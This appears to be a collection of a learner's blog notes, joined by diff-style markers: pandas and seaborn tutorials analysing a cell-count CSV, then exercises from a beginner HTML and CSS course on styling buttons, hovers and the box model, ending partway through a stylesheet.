    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    2 Set1 Image3 104.0 98.0 74 99 94
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
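    The same filter can be written with DataFrame.query, which reads closer to plain English (a sketch, standard pandas):
    df.query('Manual > 100 and Auto_th_2 < 100').head()  # equivalent to the boolean-mask version above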
    • Iterate over rows/columns
    for index, row in df.iterrows():
        average_auto = (row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_4']) / 3
        print(round(average_auto), row['Manual'])
    80 92.0
    76 87.0
    89 104.0
    94 99.0
    72 89.0
    104 115.0
    88 102.0
    96 117.0
    100 104.0
    87 103.0
    75 91.0
    98 119.0
    80 nan
    ...
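    Row loops like iterrows are slow on large tables; the same averages come from one vectorized call (a minimal sketch):
    average_auto = df[['Auto_th_2', 'Auto_th_3', 'Auto_th_4']].mean(axis=1).round()  # one rounded mean per row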

    39 - Introduction to Pandas - Grouping Data

    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df = df.rename(columns = {'Unnamed: 0': 'Image_set'})
    df.head()
    Image_set Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    df = df.drop('Manual2', axis=1)
    df.head()
    Image_set Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 70 87 82
    1 Set1 Image2 87.0 60 85 83
    2 Set1 Image3 104.0 74 99 94
    3 Set1 Image4 99.0 73 101 109
    4 Set1 Image5 89.0 59 90 67
    • Compute statistics grouped by Image_set
    group_by_file = df.groupby(by=['Image_set'])
    set_data_count = group_by_file.count()
    set_data_avg = group_by_file.mean()
    set_data_count
    Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    Image_set
    Set1 25 24 25 25 25
    Set2 25 24 25 25 25
    Set3 25 24 25 25 25
    Set4 25 22 25 25 25
    set_data_avg
    Manual Auto_th_2 Auto_th_3 Auto_th_4
    Image_set
    Set1 100.666667 72.84 98.04 92.36
    Set2 98.666667 75.40 98.00 93.44
    Set3 100.000000 78.48 95.52 94.40
    Set4 100.818182 78.76 98.76 92.64
    • Measure correlation (manual vs. automatic threshold counts)
    df['Manual'].corr(df['Auto_th_2'])
    0.7381233054217538
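    On newer pandas (2.0+), mean() on a groupby that still contains text columns such as Image raises a TypeError; selecting the numeric columns first, and letting agg compute both statistics in one pass, avoids that (a hedged sketch):
    set_stats = df.groupby('Image_set')[['Manual', 'Auto_th_2', 'Auto_th_3', 'Auto_th_4']].agg(['count', 'mean'])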

    40 - Introduction to Pandas - Dealing with missing (null) data

    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df.head(8)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    • Inspect missing values
    df.isnull()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 False False False False False False False
    1 False False False False False False False
    2 False False False False False False False
    3 False False False True False False False
    4 False False False True False False False
    ... ... ... ... ... ... ... ...
    95 False False False True False False False
    96 False False False True False False False
    97 False False False True False False False
    98 False False False True False False False
    99 False False False True False False False

    100 rows × 7 columns

    df.isnull().sum()
    Unnamed: 0     0
    Image          0
    Manual         6
    Manual2       97
    Auto_th_2      0
    Auto_th_3      0
    Auto_th_4      0
    dtype: int64
    • Drop missing values
    df = df.drop('Manual2', axis=1)
    df2 = df.dropna()
    df2.head(10)
    Unnamed: 0 Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 70 87 82
    1 Set1 Image2 87.0 60 85 83
    2 Set1 Image3 104.0 74 99 94
    3 Set1 Image4 99.0 73 101 109
    4 Set1 Image5 89.0 59 90 67
    5 Set1 Image6 115.0 82 124 105
    6 Set1 Image7 102.0 68 103 93
    7 Set1 Image8 117.0 77 122 88
    8 Set1 Image9 104.0 88 99 112
    9 Set1 Image10 103.0 69 98 94
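    dropna with no arguments removes every row that still has any NaN; standard keywords narrow this down (a sketch):
    df.dropna(subset=['Manual'])   # only require Manual to be present
    df.dropna(axis=1, thresh=50)   # drop columns with fewer than 50 non-null values (would drop Manual2)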
    df = pd.read_csv('data/manual_vs_auto.csv')
    df.describe()
    Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    count 94.000000 3.000000 100.000000 100.000000 100.000000
    mean 100.021277 91.333333 76.370000 97.580000 93.210000
    std 11.285140 7.637626 11.971055 12.327337 14.128769
    min 80.000000 83.000000 55.000000 71.000000 63.000000
    25% 90.250000 88.000000 67.750000 89.500000 83.750000
    50% 101.000000 93.000000 74.500000 98.500000 93.000000
    75% 108.000000 95.500000 85.000000 106.000000 103.250000
    max 120.000000 98.000000 109.000000 124.000000 129.000000
    • Fill missing values
    df['Manual'].fillna(100, inplace=True)
    df.head(10)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
    9 Set1 Image10 103.0 NaN 69 98 94
    • Fill missing values with the mean
    import numpy as np

    df = pd.read_csv('data/manual_vs_auto.csv')
    df['Manual'] = df.apply(
        lambda row: round((row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_4']) / 3)  # mean of the three auto counts
        if np.isnan(row['Manual'])  # only where Manual is missing
        else row['Manual'], axis=1)  # otherwise keep the existing Manual value
    df.head(10)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
    9 Set1 Image10 103.0 NaN 69 98 94
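    The same mean-fill works without apply, since fillna accepts a Series and aligns it on the index (a minimal sketch):
    auto_mean = df[['Auto_th_2', 'Auto_th_3', 'Auto_th_4']].mean(axis=1).round()
    df['Manual'] = df['Manual'].fillna(auto_mean)  # fills only the missing entries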

    41 - Introduction to Pandas - Plotting

    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df = df.rename(columns={'Unnamed: 0': 'Image_set'})
    df.head()
    Image_set Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    • Line plot
    df['Manual'].plot()
    <AxesSubplot:>

    png

    • Histogram
    # kind='hist', 30 bins, title 'Manual Count', figure size 12 x 10
    df['Manual'].plot(kind='hist', bins=30, title='Manual Count', figsize=(12, 10))
    <AxesSubplot:title={'center':'Manual Count'}, ylabel='Frequency'>

    png

    df['Manual'].rolling(3).mean().plot()
    <AxesSubplot:>

    png

    df['Manual'].describe()
    count     94.000000
    mean     100.021277
    std       11.285140
    min       80.000000
    25%       90.250000
    50%      101.000000
    75%      108.000000
    max      120.000000
    Name: Manual, dtype: float64
    df['Manual'].plot(kind='box', figsize=(8, 6))
    <AxesSubplot:>

    png

    • Scatter plot
    df.plot(kind='scatter', x='Manual', y='Auto_th_2', title='Manual vs Auto 2')
    <AxesSubplot:title={'center':'Manual vs Auto 2'}, xlabel='Manual', ylabel='Auto_th_2'>

    png

    def cell_count(x):
        if x <= 100.0:
            return 'low'
        else:
            return 'high'
    df['cell_count_index'] = df['Manual'].apply(cell_count)
    df.head()
    Image_set Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 cell_count_index
    0 Set1 Image1 92.0 93.0 70 87 82 low
    1 Set1 Image2 87.0 83.0 60 85 83 low
    2 Set1 Image3 104.0 98.0 74 99 94 high
    3 Set1 Image4 99.0 NaN 73 101 109 low
    4 Set1 Image5 89.0 NaN 59 90 67 low
    df.to_csv('data/manual_vs_auto2.csv')
    df.boxplot(column='Manual', by='cell_count_index')
    <AxesSubplot:title={'center':'Manual'}, xlabel='cell_count_index'>

    png
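    All of these calls return a matplotlib Axes, so any of the plots can be written to disk through the standard matplotlib API (a sketch; the output file name is hypothetical):
    import matplotlib.pyplot as plt
    df.boxplot(column='Manual', by='cell_count_index')
    plt.savefig('manual_by_cell_count.png', dpi=150)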

    42 - Introduction to Seaborn Plotting in Python

    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df['Manual'].fillna(100, inplace=True)
    df = df.rename(columns={'Unnamed: 0': 'Image_Set'})
    import seaborn as sns

    sns.distplot(df['Manual'])
    C:\Users\gzjzx\anaconda3\lib\site-packages\seaborn\distributions.py:2619: FutureWarning: `distplot` is a deprecated function and will be removed in a future version. Please adapt your code to use either `displot` (a figure-level function with similar flexibility) or `histplot` (an axes-level function for histograms).
      warnings.warn(msg, FutureWarning)
    <AxesSubplot:xlabel='Manual', ylabel='Density'>

    png
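    As the warning says, distplot is deprecated; the replacements it names are drop-in here (a sketch taken from the message above):
    sns.histplot(df['Manual'], kde=True)  # axes-level replacement
    sns.displot(df['Manual'], kde=True)   # figure-level replacement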

    • sns.kdeplot(): kernel density estimate plot
    sns.kdeplot(df['Manual'], shade=True)
    sns.kdeplot(df['Auto_th_2'], shade=True)
    sns.kdeplot(df['Auto_th_3'], shade=True)
    sns.kdeplot(df['Auto_th_4'], shade=True)
    <AxesSubplot:xlabel='Manual', ylabel='Density'>

    png
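    Newer seaborn releases likewise deprecate shade= in favor of fill=, so current code would read (a hedged sketch):
    sns.kdeplot(df['Manual'], fill=True)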

    • sns.jointplot(): bivariate relationship plot
    sns.jointplot(x='Manual', y='Auto_th_2', data=df, kind='kde')
    <seaborn.axisgrid.JointGrid at 0x212f9ad23d0>

    png

    • sns.pairplot(): shows pairwise relationships between features
    sns.pairplot(df, x_vars=['Auto_th_2', 'Auto_th_3', 'Auto_th_4'], y_vars='Manual', height=6)
    <seaborn.axisgrid.PairGrid at 0x212f9bd0fd0>

    png

    • sns.lmplot(): shows a linear relationship
    sns.lmplot(x='Manual', y='Auto_th_2', data=df, order=1, hue='Image_Set')
    <seaborn.axisgrid.FacetGrid at 0x212fa457f70>

    png

    from scipy import stats

    slope, intercept, r_value, p_value, std_err = stats.linregress(df['Manual'], df['Auto_th_2'])
    slope, intercept, r_value, p_value, std_err
    (0.772483189743971, -0.8937686381919718, 0.7058094587729904, 2.396963973676236e-16, 0.07831918096230937)
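    r_value here is Pearson's r; squaring it gives the usual R² of the fit:
    r_value ** 2  # ≈ 0.498, so the linear fit explains about half the variance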
    • sns.swarmplot(): categorical scatter (swarm) plot
    df = pd.read_csv('data/manual_vs_auto2.csv')
    df['Manual'].fillna(100, inplace=True)
    df = df.rename(columns={'Unnamed: 0': 'Image_Set'})

    sns.swarmplot(x='Image_Set', y='Manual', data=df, hue='cell_count_index', dodge=True)
    <AxesSubplot:xlabel='Image_Set', ylabel='Manual'>

    png

    • sns.heatmap(): heat map
    corr = df.loc[:, df.dtypes == 'int64'].corr()  # correlate all int64 columns
    sns.heatmap(corr, xticklabels=corr.columns, yticklabels=corr.columns, cmap=sns.diverging_palette(220, 10, as_cmap=True))
    <AxesSubplot:>

    png
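    Selecting on df.dtypes == 'int64' silently skips the float columns (Manual, Manual2); selecting every numeric column is more robust, and annot=True prints the coefficients in the cells (a sketch, standard pandas/seaborn):
    corr = df.select_dtypes(include='number').corr()
    sns.heatmap(corr, annot=True, fmt='.2f', cmap=sns.diverging_palette(220, 10, as_cmap=True))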

    @@ -9036,7 +9036,7 @@ /posts/Web-HTML%20&%20CSS%20Full%20Course%20-%20Beginner%20to%20Pro%20(2022)%20(6-11)/ - Resources

    HTML & CSS Full Course - Beginner to Pro (2022) - YouTube

    Course

    6. The HTML Structure

    Shows how to install Live Server in VS Code, so the page refreshes automatically as you write it:

    png

    Introduces the formal structure of an HTML document: adding <!DOCTYPE html>, <html>, <head>, <body>, and so on.

    Use <link rel="stylesheet" href="XX.css"> to reference the CSS.

    png


    png

    • 6d

    website.html:

    <!DOCTYPE html>
    <html>
      <head>
        <title>Model 3</title>
        <link rel="stylesheet" href="styles/6d.css">
      </head>
      <body>
        <p class="title">Model 3</p>
        <p>
          <span class="decription">
            Order Online for
          </span>
          <span class="link">
            Touchless Delivery
          </span>
        </p>
      </body>
    </html>

    styles/6d.css:

    Because Google Fonts is unreliable in mainland China, this workaround serves the font file locally instead: HTML5如何引入外部字体?亲测有效_52Hertz____的博客-CSDN博客_h5引入字体

    @font-face {
      font-family: "HYFengShangHei_75W";
      src: url("/styles/HYFengShangHei_75W.ttf");
    }
    p {
      text-align: center;
      font-family: HYFengShangHei_75W;
      margin: 0;
      margin-top: 15px;
    }
    .title {
      font-weight: bold;
      font-size: 40px;
    }
    .decription {
      font-size: 25px;
    }
    .link {
      font-size: 25px;
      text-decoration: underline;
    }

    png

    7. Images and Text Boxes

    <!DOCTYPE HTML>
    <html>
      <head>
        <title>YouTube.com Clone</title>
        <style>
          .thumbnail {
            width: 300px;
          }
          .search-bar {
            font-size: 20px;
            margin-left: 12px;
          }
        </style>
      </head>
      <body>
        <img class="thumbnail" src="thumbnails/thumbnail-1.webp">
        <input class="search-bar" type="text" placeholder="Search">
      </body>
    </html>

    png


    png

    • 7a 7b 7c
    <!DOCTYPE HTML>
    <html>
      <head>
        <title>7</title>
        <style>
          ._7a {
            width: 200px;
            border-radius: 30px;
          }
          ._7b {
            width: 160px;
            height: 160px;
            object-fit: cover;
            object-position: center;
          }
          ._7c {
            width: 160px;
            height: 160px;
            object-fit: cover;
            object-position: center;
            border-radius: 80px;
          }
        </style>
      </head>
      <body>
        <img class="_7a" src="picture.jpg">
        <img class="_7b" src="picture.jpg">
        <img class="_7c" src="picture.jpg">
      </body>
    </html>

    png

    png

    • 7d 7e
    <!DOCTYPE HTML>
    <html>
      <head>
        <title>7</title>
        <style>
          ._7d {
            margin: 10px;
            border-width: 1px;
            border-color: #AAA;
            padding: 8px 5px;
            border-radius: 4px;
          }
          ._7e {
            margin: 10px;
            width: 60%;
            padding: 8px 5px;
            border-radius: 13px;
            border: none;
            box-shadow: 2px 2px 10px rgba(0, 0, 0, 0.2);
          }
        </style>
      </head>
      <body>
        <input class="_7d" type="text" placeholder="Search"><br/>
        <input class="_7e" type="text" placeholder="Search Google or type a URL">
      </body>
    </html>

    png

    **Challenge Exercise**

    • 7f 7g
    <!DOCTYPE HTML>
    <html>
      <head>
        <title>7</title>
        <style>
          .text {
            color: #333;
            font-size: 12px;
            margin: 2px;
          }
          .input_box {
            padding: 5px;
            width: 320px;
            margin: 2px;
            border-radius: 3px;
            border-color: #666;
          }
          .join_button {
            margin-top: 10px;
            padding: 10px 125px;
            color: #FFF;
            border: none;
            border-radius: 20px;
            background-color: rgb(48, 109, 199);
          }
        </style>
      </head>
      <body>
        <p class="text">Email</p>
        <input class="input_box" type="text">
        <p class="text">By clicking Agree & join, you agree to the Privacy Policy.</p>
        <button class="join_button">Agree & Join</button>
      </body>
    </html>

    png

    <!DOCTYPE HTML>
    <html>
      <head>
        <title>7</title>
        <style>
          .profile {
            vertical-align: middle;
            width: 50px;
            height: 50px;
            object-fit: cover;
            border-radius: 25px;
            margin-right: 10px;
          }
          .text {
            vertical-align: middle;
            color: #888;
            margin-right: 100px;
          }
          .tweet {
            vertical-align: middle;
            background-color: rgb(12, 117, 203);
            padding: 10px 15px;
            font-weight: bold;
            border-radius: 20px;
            color: #FFF;
            border: none;
          }
        </style>
      </head>
      <body>
        <img class="profile" src="picture.jpg">
        <span class="text">What's happening?</span>
        <button class="tweet">Tweet</button>
      </body>
    </html>

    png

    8. CSS Display Property

    • display property
      • block element = takes up the entire line

    9. The div Element

    10. Nested Layouts Technique

    11. CSS Grid

    12. Flexbox

    13. Nested Flexbox

    14. CSS Position

    15. Position Absolute and Relative

    16. Finish the Project

    17. More CSS Features

    Outro

    @@ -9061,7 +9061,7 @@ /posts/Web-HTML%20&%20CSS%20Full%20Course%20-%20Beginner%20to%20Pro%20(2022)%20(0-5)/ - Resources

    HTML & CSS Full Course - Beginner to Pro (2022) - YouTube

    Course

    Intro

    ​ In this full course, we learn how to build websites with HTML and CSS, and get started as a software engineer.

    ​ Additional Information: This HTML CSS full course is a series of HTML CSS tutorials, teaching the major skills that we need to create complex websites. Each HTML CSS tutorial builds on a project and provides some HTML CSS exercises to practice what we learned. By the end, we’ll learn the basics of web development and we’ll be on our way to becoming a web developer and software engineer.


    1. HTML Basics

    HTML: HyperText Markup Language (tool we use to create websites)


    png

    • 1a. Create a button with the text “Click” inside
    <button>Click</button>

    • 1b. Create 2 buttons. 1 with your name and 1 with your favorite food
    <button>GZ</button>
    <button>dumplings</button>

    • 1c. Create a paragraph with the text “Hello, World!” inside
    <p>Hello, world!</p>

    Hello, world!

    • 1d. Create a paragraph below the previous paragraph and write something you did today
    <p>Hello, world!</p>
    <p>Today I got up early.</p>

    Hello, world!

    Today I got up early.

    png

    • 1e. Create a link to google.com (or a similar website for your country)
    <a href="https://www.bilibili.com/">Open bilibili</a>

    Open bilibili

    • 1f. Make the link from the previous exercise (1e.) open in a new tab
    <a href="https://www.bilibili.com/" target="_">Open bilibili</a>

    Open bilibili

    **Challenge Exercise**

    • 1g. Try to copy this design using HTML (the link goes to amazon.com)
    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p>Nike Black Running Shoes</p>
    <p>$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button>Add to Cart</button>
    <button>Buy now</button>

    Back to TaoBao

    Nike Black Running Shoes

    $39 - in stock.

    Free delivery tomorrow.


    2. CSS Basics

    CSS: Cascading Style Sheets (change the appearance of HTML elements)

    YouTube & Tweet

    <style>
      .subscribe-button {
        background-color: rgb(200, 0, 0);
        color: white;
        border: none;
        height: 36px;
        width: 105px;
        border-radius: 2px;
        cursor: pointer;
        margin-right: 8px;
      }

      .join-button {
        background-color: white;
        border-color: rgb(41, 118, 211);
        border-style: solid;
        border-width: 1px;
        color: rgb(41, 118, 211);
        height: 36px;
        width: 62px;
        border-radius: 2px;
        cursor: pointer;
      }

      .tweet-button {
        background-color: rgb(2, 158, 255);
        color: white;
        border: none;
        height: 36px;
        width: 74px;
        border-radius: 18px;
        font-weight: bold;
        font-size: 15px;
        cursor: pointer;
        margin-left: 8px;
      }
    </style>
    <button class="subscribe-button">
      SUBSCRIBE
    </button>
    <button class="join-button">
      JOIN
    </button>
    <button class="tweet-button">
      Tweet
    </button>

    png


    Use CSS to recreate these buttons from famous websites:

    png

    • 2a. Uber
    • 2b. Amazon
    • 2c. GitHub
    • 2d. Bootstrap
    • 2e. LinkedIn
    <style>
      .Uber-button {
        color: white;
        background-color: black;
        width: 105px;
        height: 36px;
        cursor: pointer;
      }
      .Amazon-button {
        background-color: rgb(255, 216, 20);
        width: 160px;
        height: 36px;
        border: none;
        font-size: 15px;
        border-radius: 18px;
        cursor: pointer;
      }
      .GitHub-button {
        color: white;
        background-color: rgb(46, 164, 79);
        height: 40px;
        width: 95px;
        border: none;
        font-size: 15px;
        font-weight: bold;
        border-radius: 5px;
        cursor: pointer;
      }
      .Bootstrap-button-1 {
        color: white;
        background-color: rgb(121, 82, 179);
        height: 40px;
        width: 105px;
        border: none;
        font-weight: bold;
        border-radius: 5px;
        cursor: pointer;
      }
      .Bootstrap-button-2 {
        color: rgb(108, 117, 125);
        background-color: white;
        border-color: rgb(108, 117, 125);
        border-style: solid;
        border-width: 2px;
        height: 40px;
        width: 105px;
        font-weight: bold;
        border-radius: 5px;
        cursor: pointer;
      }
      .Linkedln-button-1 {
        color: white;
        background-color: rgb(10, 102, 194);
        border-radius: 20px;
        border: none;
        font-size: 15px;
        font-weight: bold;
        height: 40px;
        width: 250px;
        cursor: pointer;
      }
      .Linkedln-button-2 {
        color: rgb(10, 102, 194);
        background-color: white;
        border-color: rgb(10, 102, 194);
        border-style: solid;
        border-width: 2px;
        height: 40px;
        width: 75px;
        font-size: 15px;
        font-weight: bold;
        border-radius: 20px;
        cursor: pointer;
      }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Cart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

    png

    png

    **Challenge Exercise**

    • 2f. Continuing from exercise 1g., recreate this design using CSS:
    <style>
      .title {
        margin: 20px 0px;
        font-size: 25px;
        font-weight: bold;
      }
      .price {
        color: rgb(0, 118, 0);
        font-size: 18px;
        font-weight: bold;
      }
      .Amazon-button-1 {
        background-color: rgb(255, 216, 20);
        border-radius: 20px;
        border: none;
        font-size: 15px;
        font-weight: bold;
        height: 40px;
        width: 140px;
        margin-right: 10px;
        font-size: 16px;
        cursor: pointer;
      }
      .Amazon-button-2 {
        background-color: rgb(255, 164, 28);
        border-radius: 20px;
        border: none;
        font-size: 15px;
        font-weight: bold;
        height: 40px;
        width: 140px;
        margin-right: 10px;
        font-size: 16px;
        cursor: pointer;
      }
    </style>

    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p class="title">Nike Black Running Shoes</p>
    <p class="price">$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button class="Amazon-button-1">Add to Cart</button>
    <button class="Amazon-button-2">Buy now</button>

    png

    3. Hovers, Transitions, Shadows

    ​ Note: put the transition property on the element itself, not inside the :hover rule; otherwise the transition doesn't play when the cursor moves away.

    <style>
      .subscribe-button {
        background-color: rgb(200, 0, 0);
        color: white;
        border: none;
        height: 36px;
        width: 105px;
        border-radius: 2px;
        cursor: pointer;
        margin-right: 8px;
        transition: opacity 0.15s;
      }
      .subscribe-button:hover {
        opacity: 0.8;
      }
      .subscribe-button:active {
        opacity: 0.4;
      }
      .join-button {
        background-color: white;
        border-color: rgb(41, 118, 211);
        border-style: solid;
        border-width: 1px;
        color: rgb(41, 118, 211);
        height: 36px;
        width: 62px;
        border-radius: 2px;
        cursor: pointer;
        transition: background-color 0.15s,
                    color 0.15s;
      }
      .join-button:hover {
        background-color: rgb(41, 118, 211);
        color: white;
      }
      .join-button:active {
        opacity: 0.7;
      }
      .tweet-button {
        background-color: rgb(2, 158, 255);
        color: white;
        border: none;
        height: 36px;
        width: 74px;
        border-radius: 18px;
        font-weight: bold;
        font-size: 15px;
        cursor: pointer;
        margin-left: 8px;
        transition: box-shadow 0.15s;
      }
      .tweet-button:hover {
        box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.15);
      }
    </style>
    <button class="subscribe-button">
      SUBSCRIBE
    </button>
    <button class="join-button">
      JOIN
    </button>
    <button class="tweet-button">
      Tweet
    </button>

    png


    Use CSS to recreate these buttons from famous websites:

    gif

    <style>
      .Uber-button {
        color: white;
        background-color: black;
        width: 105px;
        height: 36px;
        cursor: pointer;
        transition: opacity 0.15s;
      }
      .Uber-button:hover {
        opacity: 0.7;
      }
      .Amazon-button {
        background-color: rgb(255, 216, 20);
        width: 160px;
        height: 36px;
        border: none;
        font-size: 15px;
        border-radius: 18px;
        cursor: pointer;
        transition: opacity 0.15s;
      }
      .Amazon-button:hover {
        background-color: rgb(238, 200, 9);
      }
      .GitHub-button {
        color: white;
        background-color: rgb(46, 164, 79);
        height: 40px;
        width: 95px;
        border: none;
        font-size: 15px;
        font-weight: bold;
        border-radius: 5px;
        cursor: pointer;
        transition: box-shadow 0.15s;
      }
      .GitHub-button:hover {
        box-shadow: 0px 5px 10px rgba(0, 0, 0, 0.15);
      }
      .Bootstrap-button-1 {
        color: white;
        background-color: rgb(121, 82, 179);
        height: 40px;
        width: 105px;
        border: none;
        font-weight: bold;
        border-radius: 5px;
        cursor: pointer;
        transition: background-color 0.15s;
      }
      .Bootstrap-button-1:hover {
        background-color: rgb(86, 49, 128);
      }
      .Bootstrap-button-2 {
        color: rgb(108, 117, 125);
        background-color: white;
        border-color: rgb(108, 117, 125);
        border-style: solid;
        border-width: 2px;
        height: 40px;
        width: 105px;
        font-weight: bold;
        border-radius: 5px;
        cursor: pointer;
        transition: background-color 0.15s,
                    color 0.15s;
      }
      .Bootstrap-button-2:hover {
        background-color: rgb(108, 117, 125);
        color: white;
      }
      .Linkedln-button-1 {
        color: white;
        background-color: rgb(10, 102, 194);
        border-radius: 20px;
        border: none;
        font-size: 15px;
        font-weight: bold;
        height: 40px;
        width: 250px;
        cursor: pointer;
        transition: background-color 0.15s;
      }
      .Linkedln-button-1:hover {
        background-color: rgb(7, 57, 117);
      }
      .Linkedln-button-2 {
        color: rgb(10, 102, 194);
        background-color: white;
        border-color: rgb(10, 102, 194);
        border-style: solid;
        border-width: 2px;
        height: 40px;
        width: 75px;
        font-size: 15px;
        font-weight: bold;
        border-radius: 20px;
        cursor: pointer;
        transition: border-width 0.15s,
                    background-color 0.15s;
      }
      .Linkedln-button-2:hover {
        background-color: #EEF;
        border-width: 3px;
      }
    </style>
    <button class="Uber-button">Request now</button>
    <button class="Amazon-button">Add to Cart</button>
    <button class="GitHub-button">Sign up</button>
    <button class="Bootstrap-button-1">Get started</button>
    <button class="Bootstrap-button-2">Download</button>
    <button class="Linkedln-button-1">Apply on company website</button>
    <button class="Linkedln-button-2">Save</button>

    **Challenge Exercise**

    gif

    <style>
      a:hover {
        color: rgb(198, 96, 22);
      }
      .title {
        margin: 20px 0px;
        font-size: 25px;
        font-weight: bold;
      }
      .price {
        color: rgb(0, 118, 0);
        font-size: 18px;
        font-weight: bold;
      }
      .Amazon-button-1 {
        background-color: rgb(255, 216, 20);
        border-radius: 20px;
        border: none;
        font-size: 15px;
        font-weight: bold;
        height: 40px;
        width: 140px;
        margin-right: 10px;
        font-size: 16px;
        cursor: pointer;
        transition: background-color 0.15s;
      }
      .Amazon-button-1:hover {
        background-color: rgb(240, 200, 16);
      }
      .Amazon-button-1:active {
        opacity: 0.5;
      }
      .Amazon-button-2 {
        background-color: rgb(255, 164, 28);
        border-radius: 20px;
        border: none;
        font-size: 15px;
        font-weight: bold;
        height: 40px;
        width: 140px;
        margin-right: 10px;
        font-size: 16px;
        cursor: pointer;
        transition: background-color 0.15s;
      }
      .Amazon-button-2:hover {
        background-color: rgb(237, 120, 8);
      }
      .Amazon-button-2:active {
        opacity: 0.5;
      }
    </style>

    <a href="https://www.taobao.com/">Back to TaoBao</a>
    <p class="title">Nike Black Running Shoes</p>
    <p class="price">$39 - in stock.</p>
    <p>Free delivery tomorrow.</p>
    <button class="Amazon-button-1">Add to Cart</button>
    <button class="Amazon-button-2">Buy now</button>

    4. Chrome DevTools & CSS Box Model

    CSS Box Model

    • how much space an element takes up
    • how far it is away from other elements

    gif

    • 4a. - 4e. Modify exercises 3a. - 3e. to use padding instead of height/width
    <style>
    .Uber-button{
    color: white;
    background-color: black;
    padding: 8px 10px;
    margin: 5px;
    vertical-align: top;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Uber-button:hover {
    opacity: 0.7;
    }
    .Amazon-button{
    background-color: rgb(255, 216, 20);
    padding: 10px 26px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-size: 15px;
    border-radius: 18px;
    cursor: pointer;
    transition: opacity 0.15s;
    }
    .Amazon-button:hover {
    background-color: rgb(238, 200, 9);
    }
    .GitHub-button{
    color:white;
    background-color: rgb(46, 164, 79);
    padding: 10px 16px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-size: 15px;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: box-shadow 0.15s;
    }
    .GitHub-button:hover {
    box-shadow: 0px 5px 10px rgba(0, 0, 0, 0.15);
    }
    .Bootstrap-button-1{
    color:white;
    background-color: rgb(121, 82, 179);
    padding: 10px 16px;
    margin: 5px;
    vertical-align: top;
    border: none;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s;
    }
    .Bootstrap-button-1:hover {
    background-color: rgb(86, 49, 128);
    }
    .Bootstrap-button-2{
    color:rgb(108, 117, 125);
    background-color: white;
    border-color: rgb(108, 117, 125);
    border-style: solid;
    border-width: 2px;
    padding: 9px 16px;
    margin: 5px;
    vertical-align: top;
    font-weight: bold;
    border-radius: 5px;
    cursor: pointer;
    transition: background-color 0.15s,
    color 0.15s;
    }
    .Bootstrap-button-2:hover{
    background-color: rgb(108, 117, 125);
    color: white
    }
    .Linkedln-button-1{
    color: white;
    background-color: rgb(10, 102, 194);
    border-radius: 20px;
    border: none;
